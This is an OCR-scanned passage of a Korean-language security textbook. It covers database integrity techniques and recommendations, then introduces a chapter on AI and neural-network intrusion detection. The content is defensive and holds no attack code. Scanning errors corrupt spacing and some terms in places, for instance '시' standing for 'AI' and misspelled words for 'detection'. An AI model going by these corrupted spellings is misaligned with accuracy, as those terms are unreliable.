동적인 오유검출과 수정 

보통 여유자료는 오유검출코드와 수정코드의 형식을 가진다. 그 자료는 한 비트의 
변경을 명백히 알게 하며 그 변경을 제때에 그리고 자동적으로 수정할수 있게 하는 코드 
에 기록된다. 기우성 ( parity ) 이 바로 이 런 코드의 하나인데 그 코드에서는 7 bit 혹은 8 bit 로 
구성 된 매 개 프레 임 에 보충적 인 비 트가 추가되 여 그 프레 임 이 짝수 혹은 홀수와 같은 어 
떤 임의의 규칙 에 일 치되게 한다. 그 규칙 으로부터의 편기는 한 비 트가 변경되 였다는 신 
호를 발생한다. 일부 코드들은 다중비 트오유들을 자동적 으로 검 출하고 수정할 정 도로 효 
과적 이다. 이 코드들은 기 억 장치 나 혹은 자료기 지관리 자에 의하여 실 현될수 있 다. 

복사 

여유자료는 자료기지나 자료기지요소들이 여러번 완전히 복사 (copy) 되는 회수만큼 
옮겨 질수 있다. 이러한 복사는 자료기지관리자 (프로 그람)안에서나 밖에서 진행될수 있다. 
관계 는 일 반적 으로 자료기 지관리 자에 게 가장 잘 알려 지 므로 자료기 지관리 자가 제 공하는 
복개별비를 리용하면 가장 잘 보존된다. 

거울화 

거 울화 (mirroring) 는 복사의 한 형 태 로서 거 기서 는 두개 의 동기 화된 복사자료가 유지 
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된다. 거울화는 자료기지안에서 진행되며 따라서 자료기지밖에서는 그 복사자료를 볼수 
없다. 례를 들어 파일관리자가 파일을 거울화할수 있다. 파일관리자는 변경내용을 두 복 
사본에 다 적용하고 두 복사본으로부터의 요청을 만족시키지만 자료기지밖의 공정에는 
두번째 복사자료가 존재하는것을 숨긴다. 거울화는 한 장치나 서로 다른 장치에서 진행 
될수 있다. 한 장치에서 진행될 때 거울화는 매체고장이나 장치의 제한된 고장(가령 불 
량자리길)이 있어도 자료를 보호한다. 장치들사이에서 진행될 때에는 일반적인 장치고장 
이 있어도 자료를 보호 한다. 

예비복사 

자료기 지 의 예 비 복사 ( backup ) 는 자료기 지 관리 자에 무관계 하게 진행 된 다. 다른 손실들 
가운데서 이 복사본은 특수하게 관리 자가 실수하거 나 부주의로 하여 있을수 있는 손상으 
로부터 자료를 보호 한다. 

이러한 복사는 자료기지관리자나 자료기지자체에 무관계한 편의프로그람 혹은 다른 
프로그람공정 들에 의하여 자동적 으로 준비 될 수 있 다. 물론 비 록 자료기 지 고장이 있 어 도 
보호하기 는 하지 만 독립 적 인 예 비 체 계 를 리용하는것 은 그 자체 가 자료기 지 의 무결성 에 
대한 위협으로 될수 있다. 독립적인 체계는 자료기지관리자자체가 집행하는 규칙을 알고 
집행하기는 어렵다. 

검사점과 실행기록 

검 사점 은 예 비 복사의 특수경 우이 다. 검 사점 은 특수한 점 에 제 때 에 설 정 된 다. 례 를 들 
면 자료기지의 초기상태는 가령 비 여 있다 해도 검사점 이 다. 검사점들은 그에 뒤따르는 
모든 갱 신활동의 실행 기 록 ( journal ) 이 나 운용기 록 ( log ) 과 관련하여 리 용되 여 자료기 지 를 재 
구성 한다. 이 방식 에서 는 무결성 파 현행성 ( currency ) 이 둘 다 보존된다. 

재구성 

큰 고장이 있는 경우에는이러한 2차적인 복사본들을 리용하여 자료기지를 재구성할 
수 있다. 그러나 이것은 일부 경우에는 자료기지의 무결성이 이런 2차복사본의 무결성에 
더 의 존할것 이 라는것 을 의 미한다. 

구획화 

구획화한다는것은 사물들을 분리된 구획들에 배치한다는것이다. 그 목적은 한 구획 
에서 생기는 결과들을 포함함으로써 이 결과에 의하여 다른 구획들이 영향 받지 않게 하 
는것 이 다. 례를 들어 단일한 큰 자료기지관리자에 앞서 여 러가지 작은 자료기지관리자들 
을 실 행하여 고장의 영 향을 제 한하도록 할수도 있 다. 
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분리와 독립성 


자료기지관리체계들은 무결성을 보존하기 위 하여 흔히 부분공정들의 분리 및 독립성 
을 실행한다. 례를 들면 자료기지관리체계들은 갱신을 실행하는 공정，갱신이 정확히 진 
행되였는가를 검사하는 공정，수정작용을 하는 공정들을 모두 분리한다. 그 목적은 한 
고장이 세개의 공정에 다 영향을 줄 가능성을 최소화하자는데 있다. 

교갑화 

자료기지관리자는 자료기지를 외부적인 간섭이나 오염으로부터 보호하는 역할을 하 
는 묶음, 용기 혹은 교갑으로 볼수 있다. 교갑화 ( encapsulation ) 는 물리적인것이거나 혹은 
론리적 인것 일수 있 다. 자료기 지관리 자인 경 우 물리 적 인 교갑화는 자료기 지관리 자를 개 별 
적 인 콤퓨터 에 배 치하는 방법 으로 보장될수 있 다. 론리 적 인 교갑화는 자료기 지관리 자를 
공유된 콤퓨터 와 그 조작체 계 가 제 공하는 환경내 에서 분리 되 고 보호된 공정 에 배 치하는 
방법으로 보장될수 있다. 론리적인 교갑화는 또한 부분적으로 정적인 조건에서 비밀코드 
(secret code ) 에 의 하여 보장될 수 있 다. 

대 부분의 자료기 지 관리 체 계 들은 자료기 지 의 일 정 한 교갑화를 제 공한다. 객 체 지 향자 
료기지 관리체 계들은 정의 에 의하여 명시적 으로 그리 고 전반적 으로 그런 교갑화를 제공한 
다. 앞으로 자료기지관리자자체가 그 하드웨어에서 교갑화되고 있다는것을 보게 된다. 

숨기기 

교갑은 자료기지의 내용들을 외부에서 보거나 리용하지 못하도록 숨긴다. 이것은 자 
료기지를 파괴면에서는 더 안전하게 하지는 못하지만 비 법적 인 로출과 의도적이면서도 
눈에 띄지 않은 변화로부터 그 내용들을 보호한다. 숨기기 ( hiding ) 는 여러가지 방법으로 
실현될수 있다. 가장 일반적 인 방법은 공정의 호상분리，자료형만들기 및 자료형관리자에 
의한 방법 과 비 밀 코드를 리 용하는 방법 이 다. 

맺기 

맺 기 ( binding ) 는 가령 자료특성 이 나 혹은 참조가 후에 변화되 지 않도록 결정 하고 고 
정하는데 리용된다. 콤퓨터과학에서는 초기맺기와 마감맺기라는 말을 사용한다. 례를 들 
면 일부 프로그람작성 에서는 기 호적이름들이 콤파일될 때 변화되지 않도록 맺 어 지며 한 
편 다른 프로그람작성 에서는 갈은 특성 들이 실행될 때 까지 맺어지지 않을수 있다. 

많은 구조형 자료기지관리 체 계 들은 프로그람작성 이 나 프로그람적재시 에 관계 들을 자료 
기 지 에 맺 는다. 이 렇 게 하면 유연성 은 손실 되 고 유지 비 용은 증가되 지 만 무결 성 과 성 능을 개 
선할수 있다. 관계형자료기지 관리 자들도 역시 자료기지구축에 표형 태의 맺기를 채용한다. 

맺 기는 그것 이 진행 되 는 환경내 에서 만 적 용된다. 만일 자료나 자료기지 가 자료기지 
관리자로부터 분리 되 면 그때 특성 들은 더 는 맺 어 지 지 않으며 믿 을수 없 다. 
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미세갱신 


미세 갱 신知 tomic update ) 이 란 자료기지 의 임 의의 변화가 전일적 으로 발생 하거 나 전혀 
발생하지 않는다는것 을 의 미한다. 부분갱 신 이 란 없 다 . 미 세갱신은 자료요소와의 관계 를 
포함한다. 대부분의 자료기 지관리 자들은 전일적 으로 완결될수 없는 임 의의 부분적 인 갱 
신을 이 른바《 복구》하는 능력 을 유지 하는 방법 으로 미세갱 신을 실현한다. 

잠그기 

자료기지무결성 에 대 한 잠재 적 인 위협의 하나는 둘 혹은 그이상의 공정 에 의한 동시 
적 인 리용으로부터 생 긴다. 례 를 들면 두 사용자가 자료기 지 를 변화시 킬 때 두번째 변화 
가 첫번째 변화에 덧씌워 질 가능성이 있다. 자료기지관리체계는 이러한 문제의 발생을 
막는 잠그기 ( locking ) 와 같은 기능들을 제공한다. 

잠그기 는 부분적 으로 갱 신될 요소들과 관계 들이 리용되 지 않는다는것 을 담보하기 위 
하여 자료기 지관리 자들이 채 용하는 하나의 기 능이 다. 이 기 능에 의하여 요소에 《 사용 
중》이 라는 표식 이 불거 나 갱 신되 는 모든 요소들에 《 잠그기요구》라는 표식 이 불는다. 
이 기능은 사용중에 있는 요소의 두번째 리용을 허용하지 않으며 갱신되는 모든 요소들 
이 잠그어 질 때까지는 갱신을 시작하지 않는다. 그렇지만 잠그기는 보통 물리적 인 기능 
이 라기 보다는 오히 려 론리적 인 기 능이 다. 잠그기 는 일 반적 으로 잠그기 혹은 열기 로 설정 
되 는 한비 드 혹은 기 발이 다. 

잠그기는 투명성과 세립성의 여러 준위로 진행할수 있다. 리상적으로는 잠그기는 자 
동적 이 고 모든 사용자들에 게 있 어서 나 공정 의 리용에 있어 서 투명하다. 그러 나 이 방법 
은 필요없이 성능에 영향을 줄수도 있다. 례를 들면 투명성이 최대인 경우 자료기지관리 
체계는 응용프로그람 A 가 갱신을 위하여 선택된다는 가정하에서 응용프로그람 A 가 관리 
하는 임의의 자료에로의 접근을 응용프로그람 표가 못하게 제한할수 있다. 결국 응용프로 
그람 B 는 잠재 적 인 갱 신을 고려 하지 않는다 해 도 성 능은 떨 어 질 것 이 다. 

성능은 또한 응용프로그람 표의 접근이 응용프로그람 A 가 갱신할수 있는 최소의 요 
소에만 국한될것을 요구한다. 응용프로그람 B 는 다만 응용프로그람 A 가 표의 단 하나의 
행 에 관심하기때문에 전체 표로부터 제 한을 받아서 는 안된다. 결국 최대성능은 A 와 표가 
자기의 목적을 선포할것을 요구한다. 

접근조종 

접근조종은 자료기지의 관리자들로 하여금 사용자나 사용하는 공정들이 자료기지와 
그 요소들 혹은 그 관계를 변경시키 는것 을 조종할수 있도록 자료기지관리체계 에 의하여 
제 공되는 기능이 다. 이 조종은 다중사용자들이 리용할수 있도륵 자료기지관리체계 에 포 
함시키 는것 이 가장 좋은것 갈다. 그 조종은 자료기 지 를 변경 시 킬수 있는 사용자의 수를 
계획된 수로 변화시킨다는 점에서 하나의 무결성기능이다. 그것은 또한 오유나 악의 
( malice ) 를 막기 위 한 이 중통제 를 실 행 하는데 리 용된 다. 
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특권적조종 

대 부분의 자료기지 관리체 계 들 특히 접 근조종을 제 공하는 자료기 지 관리체 계 들은 특권 
적 조종기 능을 제 공한다. 이 특권적 조종의 목적 은 체계관리 자들이 리 용하기 위 한것 이 다. 
이 조종은 궁극적인 조종을 실행하기 위하여 특히 비정상적인 상태를 수습하기 위하여 
리용된다. 두가지 비정상적 인 상태 가 특별히 주목된다. 첫번째는 접근조종을 무효로 하는 
것 이 다. 이 능력 은 교착 ( deadlock ) 상태 를 피 하기 위 하여 필 요할수 있 다. 두번째 는 자료기 
지 그 자체를 보수하기 위한 특권의 리 용이 다. 초기의 구조화된 자료기지 에서는《 파손 
된 사슬을 보수》하기 위하여 이러한 조종들을 리용하였다. 

지적하여 야 할것은 이 런 특권적조종이 자료기지를 오염시키거 나 자료기지 에 간섭할 
수 있다는것이다. 

조정 

조정 ( reconciliation ) 는 자료기지를 조화 혹은 일치되게 하는 작용이 나 공정 을 가리 킨 
다. 즉 자료기 지 를 검 사하고 그 변화를 수정하는 작용 혹은 공정 을 가리킨다. 일 반적 으로 
자료기지관리체계들은 이러한 검사를 루린(부분프로그람)에서 자동적으로 자주 그리고 
완전히 련속은 아니 지 만 반복적 으로 실 행한다. 례 를 들면 다른 공정 (례 컨대 파일 체 계 )에 
쓰기 요청 을 한후 자료기 지관리 자는 그 요청 이 정 확하게 완결되 였는가를 확인하기 위하여 
즉시 검사를 할수 있다. 루린과 이 활동의 자동적인 특징으로 하여 조정은 회복과 구별 
된다. 다른 차이점은 조정 이 거의 전용적으로 내부자원에 의거한다는것 이 다. 

회복 

회복 ( retrieval ) 은 무결성기능의 마지막수단으로서 자료기지가 그것을 보수할수 있는 
어떤 다른 기능의 능력 이상으로 파손되였을 때 리용된다. 회복은 일반적으로 외부적으로 
요청되며 자료의 예비복사와 갈은 외부자원에 의거한다. 회복은 자료기지를 무결성상태 
로 회복시키는 반면에 돈이 많이 들고 지 어 자료를 잃게 할수도 있다. 

결 론 


자료기 지 무결 성 은 본질 적 인 속성 이 다. 만일 자료에 의 거할수 없 다면 자료기 지 는 리 
용할수 없다. 무결성은 보존하기는 쉬워도 다시 창조하기는 힘들다. 하나의 도구나 기능 
만 가지 고는 안된다. 자료기지 관리체 계는 다양한 도구들을 리용하며 소유자와 관리 자들 
은 완전히 외부적 인 도구들을 채용하여 자료기지관리자의 고유한 제한성을 메꾸어 주어 
야 한다. 

자료기지의 무결성을 보존하자면 적어도 다음과 갈은 네가지 사항이 필요하다. 
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1. 자료요소들과 그리고 그것들사이의 관계를 다 보존해 야 한다. 

2. 자료기지 관리체 계 가 제공하는 기능들을 리 해 하고 리 용하여 야 한다. 

3. 이 기 능들중 임 의의 기 능을 그 리 용과정 에 또는 외 부적 으로 손상시키 지 말아야 
한다. 

4. 자료기지관리체 계의 제 한성 을 리해 하고 그것 을 보상하여 야 한다. 

자료의 단순한 복사로는 관계에 포함된 정보를 보존하지 못할수도 있다. 례를 들면 
만일 구조화된 자료기지 가 장치안에서 자료의 물리적위 치관계 에 대 한 정보를 포함한다면 
그때 자료의 복사는 자료가 갈은 장치에 있을 때에만 그 관계를 보존할수 있다. 

모든 자료기 지관리 체 계 들은 기 능들의 결 합으로 관계 를 실 현 하며 그 기 능들의 대 부분 
이 숨겨 지 므로 자료기지관리체계 를 우회하는 운영 절차나 관리는 의 심스럽다. 한편 자료 
기지관리체계와 무관계한 무결성을 보존하는 다른 대책이 없다면 한 기능의 고장으로 자 
료기지가 파괴될수 있다. 

주의하여 야 할것 은 대 부분의 견고한 자료관리자들은 자료기 지 를 교갑화하므로 그 관 
리 자들을 우회할수 없다는것 이 다. 자료기지관리 자를 우회하려는 임의의 시도는 극상해서 
자료기지를 외곡하지 만 최 악의 경우에는 자료기지 와 자료기지관리체계를 파괴시 킨다. 대 
부분의 자료기지관리체 계들은 또한 자료기지의 외부적표현을 구축하는 여 러개의 내 장기 
능들을 제공한다. 

마지막으로 언급할 문제는 규모 ( scale ) 문제 이다. 대부분의 자료기지들은 그것들을 상 
주시키는 체계나 장치에 비하면 상대적으로 작다. 그러나 가장 중요한 자료기지들가운데 
서 많은 자료기지들은 대단히 크며 수십 혹은 지어 수백개의 장치들을 망라한다. 이러한 
자료기지에서 관계에 관한 정보는 많은 장치들을 망라할수 있다. 자료기지의 무결성은 
장치들과 장치들사이의 관계를 보존할것을 요구한다. 

한편 이 자료기지들에서는 자료기지나 파일이 아니 라 오히 려 예비장치복사에 의하여 
외부적인 복사본들을 구축하는것이 일반적이다. 이러한 예비복사는 장치 및 장치마당에 
종속된다. 이 예비장치들은 하나 혹은 두개의 장치들이 고장나도 적당한 보호를 제공하 
는 반면에 전체 환경이 파괴되는 경우 회복하자면 그 환경의 완전한 재현을 요구할수도 
있다. 이 재현은 며칠 혹은 지어 몇시간안에 진행되여야 한다. 그러므로 장치와 독립적 인 
예 비복사를 해두는것 이 가장 절실한 자료기지들에서 는 외부적 인 장치예비 복사가 적 당치 
않을수 있다. 


권고사항 

이 부분에서는 자료기지의 무결성을 보호하는것과 관련한 몇가지 권고를 제시한다. 
이 권고에는 자료기지관리체계의 리용과 그 제한성을 극복하는것과 관련한 일부 권고들 
이 포함된다. 
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1. 특징，기능，속성들이 목적한 응용프로그람이나 환경에 충분히 견고한 자료기지관 
리자를 선택하시오. 

2. 지 도서 에 따라 자료기지관리체계를 리용하시 오. 모든 제 한성을 지적 하고 고려하 
시오. 

3. 자료기 지 와 자료기 지관리 자를 견고한 환경 에 배 치하시 오. 

4. 응용프로그람이 나 환경 에 의하여 지적된대 로 충분한 자원들(례 컨대 거 울파일，장 
치 그리고 조종부들)을 제공하시오. 

5. 무결성을 위해서는 전일적인 자료기지를 선택하시오. 성능에서의 기본차이에 의 
하여 허 용된 정 도로만 분산형자료기 지관리 자를 리용하시 오. 

6. 무결성 을 위 해서 는 자료기 지 와 자료기 지관리 체 계 그리 고 처 리 기 사이의 일 대 일 
관계 를 선택 하시 오. 규모의 경제 성 (economy of scale ) 에 의 하여 지 적된 정 도만큼 
공유하시 오. 명 심할것 은 오늘날의 콤퓨터 체 계 들은 그 응용에 따라 더 쉽 게 규모가 
조절될수 있다. 대규모의 공유로는 더는 종래의 경제성을 유지할수 없다. 

7. 무결성을 위 해서는 관계형 및 객체지 향형자료기지를 선택하시오. 성 능측면에서 는 
구조화된 자료기지쪽이 더 좋다. 

8. 응용프로그람이 나 사용자들은 그것 이 의 거하는 자료기 지관리 자의 동작을 검 사하 
여야 한다. 

9. 자료기 지 와 자료기 지내 부요소에 로의 접 근을 응용프로그람과 관계 되 는 최 소수의 
알려 진 사용자와 공정으로 제 한하시오. 

10. 접근조종은 자료기지에 대한 기밀정보를 갱신하는데 여러 사람들이 참가하도록 
적용하시오. 

11. 우선권조종을 리용할 때 에는 많은 사람들을 포함시키시 오. 

12. 검 사점과 갱 신활동의 실행기록을 포함하여 여 러개의 자료예 비복사본과 자료갱 신 
본을 보관하시오. 

13. 특히 여 러개의 장치 들을 망라하는 자료기 지 에 대 하여서 는 장치 와는 독립 적 인 예 
비 복사쪽을 선 택하시 오. 

14. 장치 의 독립 성 과 관련 하여 자료기 지관리 자가 제 공하는 봉사에 의한 예 비복사를 
하는것 이 좋다. 성 능측면 에 서 는 독립 적 인 기 구들을 리 용하시 오. 

15. 관계 의 보존과 관련 하여 자료기 지관리 자가 제 공하는 봉사에 의한 예 비복사를 하 
는것 이 좋다. 독립성 을 위하여 그리고 기구의 고장이 있어 도 복사하기 위 해서는 
다른 수단에 의하여 예 비복사를 하는것 이 더 좋다. 

16. 자료기지를 외부에서 복사하는것을 막기 위해서는 그 관리에 여러 사람들을 인 
입 하시 오. 

17. 회복후와 리용하기전에 무결성을 검사하시오. 부식된 자료기지를 표준적으로 리 
용한다고 해도 그 손상이 퍼지며 불량자료를 리용하면 기업에 심중한 손해가 초 
래된다는것을 명심하시오. 
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제 7 편 
운영 보안 


운영보안은 보통 자료쎈터를 위주로 볼수 있지만 그 개념은 지난날의 개념이다. 
현재 그 개념은 례컨대 모든 형태의 자료처리조작에 대한 행정적관리와 분산운영은 
물론 집중운영의 보안개념，운영조종의 각이한 선택，자원보호요구사항，회계운영，감 
시 및 침입탐지를 비롯하여 훨씬 더 많은 내용들을 포함한다. 이 편에서는 침입해석 
과 그리고 일 반적 인 자료중심 문제 와는 거 리 가 먼 전자상업 거 래 환경 에서의 회 계 에 중 
심을 둔다. 

지능적 인 침 입해석을 고찰한 36장에서는 사유하는 기계 가 콤퓨터침 입을 어떻게 
인식하는가 하는데 대하여 론의한다. 현재의 판매품인 침입람지체계를 리용하는 경우 
에도 련방법무성통계자료에 의하면 체계행정관리자가 람지하는 매개 침입에 대하여 
침입탐지체계는 10번 탐지한다. 완전한 예방대책은 기대할수 없으므로 탐지방법(가령 
침 입람지체 계 )들이 준비 되 여 야 한다. 이 장의 목적 은 다음과 같은 세 가지이 다. 즉 문 
제해 결에 인공지능의 리용을 촉구하는것，인공지능의 기 초개 념 들을 소개하는것 그리 고 
침입해석에 대한 인공지능의 리용을 람구하는것이다. 이 장에서는 인공지능을 리용하 
여야 할 리유를 고찰한 다음 인공지능의 기초개념들을 소개한다. 지식의 역할，침입람 
지수법 들，신경회 로망과 신경회 로망의 학습능력 그리 고 각이한 공격탐지 에서의 그 리 
용에 대하여 고찰한다. 

37장에서 는 전자상업거 래환경 에서 의 안정 성 및 신뢰 성 의 중요성 에 대 하여 해 설 한다. 
거기 에서는 전자상업거래，상업적거 래방법과 관련된 위험을 정의한다. 또한 효률적 인 전 
자상업거 래개 발에서 전략이 기 본열쇠 라는것을 서술한 다음 그 의미를 론의한다. 법적 인 
내 적관계 는 하나의 난점 으로 언급된 다. 전자상업 거 래구조의 구성 성 분들에 대 하여 서 도 상 
세하게 서 술한다. 전자상업 거 래 환경 에서 일하는 사람들이 전자상업 거 래 운영 을 성 과적으 
로 보호하자면 배워야 할것이 많다. 


536 



제 3 6 장. 지능침입분석 

브라이언 피쉬 

위험관리는 정보보안의 기본이다. 가장 바람직한 수법은 위험을 총체적으로 피하든 
가 혹은 련관된 위협들이 발생하는것을 막는것이다. 예방대책도 중요하지만 때때로 예방 
대책도 보안사고를 막지 못한다. 이것을 고려하자면 기관들이 자기들의 보안방책들이 위 
반되는것을 식별하고 대응할수 있어야 한다. 완전한 위험완화전략은 예방대책들을 보충 
하는 탐지 및 수정대책들을 포함하여야 한다. 이 장에서는 침입을 람지하는 인공지능기 
술에 대하여 조사한다. 

침입이 무엇으로 구성되는가에 대한 지식은 합법적인 활동과 침입을 구별하는 기본 
열쇠이다. 그 지식을 기계가 리해하는 방식으로 표현하기는 어려우며 결국 침입탐지문제 
는 콤퓨터로 해결하기 어려운 문제이다. 대조적으로 대부분의 보안전문가들은 이러한 지 
식들을 소유하고 있으며 따라서 쉽게 침입을 탐지할수 있다. 오늘날의 정보체계능력은 
규모가 큰 분석진영도 압도하기때문에 침입을 수동적으로 분석한다면 원가가 맞지 않는 
다. 필요한것은 수동적인 침입분석의 지식과 정확성을 콤퓨터의 능력 및 효률성에 결합 
시키는 체계이다. 

이 장에서는 침 입탐지체계 로서 전망이 있는 일부 인공지 능 ( AI ) 기술들을 고찰한다. AI 
의 기 본개 념 들을 소개한 다음 신기 술이 침 입람지문제 에 적 용되 는 한가지 방식 에 대 하여 
깊이 조사한다. 그 목적은 다음과 같다. 

1. 시를 리용하여 문제 해 결수법 을 전반적 으로 고찰하는것， 

2. 시의 기 본개 념 들을 소개하는것 , 

3. AI 에 의한 침 입분석 을 탐구하는것 . 

첫 번째 목적 은 전통적 인 기 계 처 리 과정 을 인간의 사고와 대 비 하는 방법 으로 론의 한다. 
그리 고 두번째 와 세번째 목적 은 침 입탐지 의 효률성 과 정 확성 을 개 선하는 시에 기 초한 
방법 들에 대 한 현재 의 연구결 과들을 론의하는 방법 으로 고찰한다. 

인공지능 


인간의 지능은 행성우에서 가장 위력하고 견고한 체계의 하나이다. 수년간의 연구를 
통하여 과학자들은 지능에 대 하여 많은것을 알게 되 였으며 콤퓨터와 인간의 지능사이의 
두드러 지 는 차이 를 발견하게 되 였 다. 인공지 능 ( AI ) 연구에서 는 현재 인간에 의하여 최 량적 
으로 수행되는 과제들을 콤퓨터가 더 능란하게 풀수 있는 방법을 개발한다. 

지능의 리해와 관련하여 세가지 형태의 과제 즉 일반과제，형식화과제 및 전문가과제 
를 구별하는것 이 편리하다. 일반적 으로 이 과제 들을 수행하는 능력은 서 로 의존되 여 있다. 
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전문가과제에는 과학적인 분석，공학설계 그리고 의학진단과 같은 과제들이 포함된다. 이 
과제들을 수행하자면 우선 기초수학 및 론리연산과 같은 일정한 형식화과제들에 정통하여 
야 한다. 이 형식화과제들의 실행은 감각，인식 그리고 주어 진 문제범위에서 언어처리와 
같은 일반과제를 수행하는 능력에 의존한다. 잘되자면 형식화된 과제들은 잘 째인(명백한) 
문제들에 대하여 실행되여야 한다. 사람은 문제의 범위를 리해하고 정의하기 위하여 감각 
및 추리와 갈은 일반기능들을 리용한다. 사람들이 감각기능을 통하여 엄게 되는 세련이 없 
다면 형식화된 방법들은 쓸모가 없게 된다. 간단히 말하면 전문가과제들은 일반기능을 응 
용하여 리해하게 되는 문제들이 적 당한 공식적 인 방법에 의하여 실행될것을 요구한다. 

콤퓨터는 바로 계산수단이다. 콤퓨터는 매우 빠른 속도와 높은 정확도로 2진대수를 
리용하여 단순한 연산을 실 행할수 있 도록 제 작되 였 다. 콤퓨터 는 수백 만개 의 단순한 연산 
들을 특수한 방식 으로 편성하여 더 복잡한 기 능들을 실 행할수 있 다. 한편 인간의 지 능은 
콤퓨터 에 서 복제 하기 어 려 운 수준 높은 과제 들을 자연스럽 게 처 리할수 있 다. 콤퓨터 는 
인 간지 능의 능력 을 잘 복제하지 못한다. AI 연구가 이 간격 을 보충하는 방법 을 관찰하기 
에 앞서 지능의 독특한 두가지 능력 즉 일반화와 학습능력에 대하여 보기로 하자. 

• 일반화. 인간은 자기에게 제시된 개념들을 일반화할수 있고 사물현상의 구체적 
인 특성과 함께 본질을 인식할수 있다. 인간은 입 력 자극(례 컨대 객체，상태，개 
념，느낌 등)의 명 확한 특징들을 매개의 구체적 인 마지막세부를 기 억하지 않고 
도 식 별 한다. 인 간의 지 능은 입 력 자극의 본질 을 리해할수 있 으므로 인 간은 객 체 
를 기억하지 않고도 학습을 통하여 개념을 리해한다. 이것은 사람이 이미 학습 
을 통하여 인식한 원래의 개념의 실례로부터 조금 변할수 있는 개념의 실례들을 
인 식하게 한다. 

• 학습. 인간은 자기의 경험으로부터 학습할수 있는 능력 에서 기계와는 다르다. 만 
일 사람들이 오늘에 본 객체 가 장방형 이라는 말을 듣는다면 사람은 그것을 기 억 
하고 래일，다음주 그리 고 다음해 에도 같은 객체 를 장방형 으로 식 별할것 이 다. 인 
간지능은 사유패 런과 개 념 들을 기 억할수 있는 큰 기 억 용량을 가지 고 있 다. 앞으 
로 리용하여 야 할 방식 에 기 초하여 정 보들을 편성 함으로써 인간지 능은 필요할 
때마다 기억된 정보를 되살릴수 있는 거대한 능력을 제공한다. 사유패턴을 기억 
하고 되 살리 는 이 능력 을 학습이라고 한다. 

지식의 역할 

수십년간의 AI 연구는 적 어도 다음과 같은 하나의 론박할수 없는 주장을 론증하였다. 
즉 지능은 지식을 요구한다. 지식은 인간의 감각기능을 위한 환경과 그리고 문제해결에 
서 공식 적 인 방법 들을 응용하기 위한 기 틀을 제 공한다. 인간은 기 본기 능들을 반복하여 
실행하는 능력은 가지고 있지만 지식이 없이는 지능을 련상케하는 방식으로 그 활동들을 
편성하는 능력 은 충분히 가지 고 있지 못하다. 

료리에서 두개의 옥파가 필요하다고 가정하자. 감각기능으로 사람은 식료품보관실에 
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있는 옥파 하나를 인식할수 있다. 형식화된 수학기능에 의하여 사람은 옥파가 한개밖에 
없고 하나 더 필요하다는것을 판단할수 있다. 상점에 가서 옥파 하나를 사올 필요가 있 
다고 결심하는것은 전문가과제이다(비록 특별히 어려운 과제는 아니지만). 이 모든 기본 
기능은 지식에 의하여 결합된다. 사람은 이미 가지고 있는 옥파들을 찾을 장소를 알고 
있다. 사람은 옥파가 몇개나 있는가를 보기 위하여 세 보아야 한다는것을 알고 있다. 사 
탐은 몇개의 옥파가 더 필요한가를 판단하기 위하여 단순한 덜기연산을 실행하여야 한다 
는것을 알고 있다. 이 모든 단편적인 지식이 없다면 문제를 풀기 위하여 일반과제，형식 
화과제 및 전문가과제들을 편성할수 없다. 

기계는 형식화과제들을 실행하는데서는 우월하다. 수학 및 론리와 갈은 과제들은 형 
식화적으로 정의될수 있고 콤퓨터에 의하여 거대한 속도와 정확도로 실행될수 있다. 그 
러나 자명하지만 기계는 앞에서 언급한 일반과제와 전문가과제들을 수행하기는 아주 어 
렵다. 그것은 대체로는 지식을 콤퓨터가 리해할수 있는 방식으로 표현하는것과 관련된 
난점에 기인된다. 

인간은 지식을 창조하고 기억하고 되살리며 응용하는 뛰여난 능력을 가지고 있다. 
유감스럽게도 지식은 방대해 지고 특징을 부여하기가 어려우며 끊임없이 변화되여 가기 
때문에 기계로 처리하기가 어렵다. 더우기 인간의 지식은 리용방향에 따라 편성된다. 이것 
은 구조적인 방식으로 편성되는 콤퓨터자료와 크게 차이난다. 만일 기계가 문제들을 지능 
적인 방식으로 풀기를 바란다면 인간은 기계에 필수적인 지식과 그 지식을 활용하는 능력 
을 부여하여야 한다. 실용적으로 그 지식은 다음과 갈은 일정한 특성을 가져야 한다. 

• 지식은 일반화되여야 한다. 

• 지식은 간단한 변경이나 수정 그리고 갱신이 가능해야 한다. 

• 지식은 그것이 완전하지 못하거나 혹은 총체적으로 정확하지 못하다 해도 무수 
한 정황에서 리용할수 있어 야 한다. 

• 지식은 방대한 그자체의 지식공간을 주어 진 정황에 맞는 부분공간으로 축소할 
수 있어 야 한다. 

지식기지형체계라는 용어는 우의 조건을 만족하는 편리한 방식으로 전문지식을 표현 
하고 문제 해 결 에 그것을 적 용하는 수단을 제공하는 문제 해 결체 계를 표현하기 위 하여 사 
용되는 용어이다. 신경회로망을 리용한 패런정합이 지식에 기초한 체계의 한 실례이다. 
이 장에서는 콤퓨터침입탐지의 범위에서 신경회로망기술을 리용한 지식의 표현 및 활용 
에 대하여 론의한다. 


패턴정합식침입탐지수법 

신기술을 침입탐지에 적용하는데서 누구나 바라는것은 인간의 수동적인 분석의 효 
과성을 개선하는것이다. 사람들은 탐지 및 응답과정에서의 자기의 참여를 줄이려고 하며 
또한 자기가 참가하는 경우라 해도 허위경보신호의 수를 줄이려고 한다. 이것은 정의 허 


539 



위와 부의 허위의 오유률로 측정되는 침입탐지체계의 정확성을 개선하는 방법으로 달성 
될수 있다. 정의 허위률은 체계가 발생하는 허위경보의 퍼센트이다. 부의 허위률은 체계 
가 놓친 실제침입의 퍼센트이다. 매혹적인 정의 허위률을 가지는 체계를 개발하면 사람 
이 조사하여야 할 사고의 수를 줄일수 있다. 그러나 정의 허위률을 줄일 때에는 실제적 
인 침입을 꼭 탐지한다는것을 담보하는 매혹적인 부의 허위률을 유지하는데 주의를 돌려 
야 한다. 

패런정합은 침입탐지와 관련하여 론리적인 선택으로 된다. 침입탐지에서 가장 주요 
한 난점의 하나는 새로운 공격을 인식하는것이다. 이 새로운 공격은 이미 알려 진 기술 
의 외적인 변동이나 혹은 체계에 침투하는 완전히 새로운 방법일수도 있다. 어느 경우에 
나 많은 전통적인 침입 람지체계들은 그 공격을 인식하는데서 애로를 느질것이다. 패런정 
합은 일반화능력을 리용한다. 패턴정합은 새로운 입력과 알려 진 패턴사이의 정확한 특 
징별정합이 아니라 입력이 알려 진 패턴의 《본질》을 가지고 있는가를 판별한다. 이 수 
법은 두개의 실체로 하여금 외견상의 특징은 일부 다르다 해도 서로 정합되게 한다. 

이 부분에서는 두개의 구체적인 신기술에 기초한 개념적인 패턴정합침입탐지체계를 
고찰한다. 신경회로망은 체계의 뇌수와 같은 역할을 하며 문제범위와 관련한 지식을 기 
억 하고 그 지 식 을 침 입탐지 에 적 용한다. 자체 조직 화사영 은 수집 된 원 자료 (raw data ) 에 대 
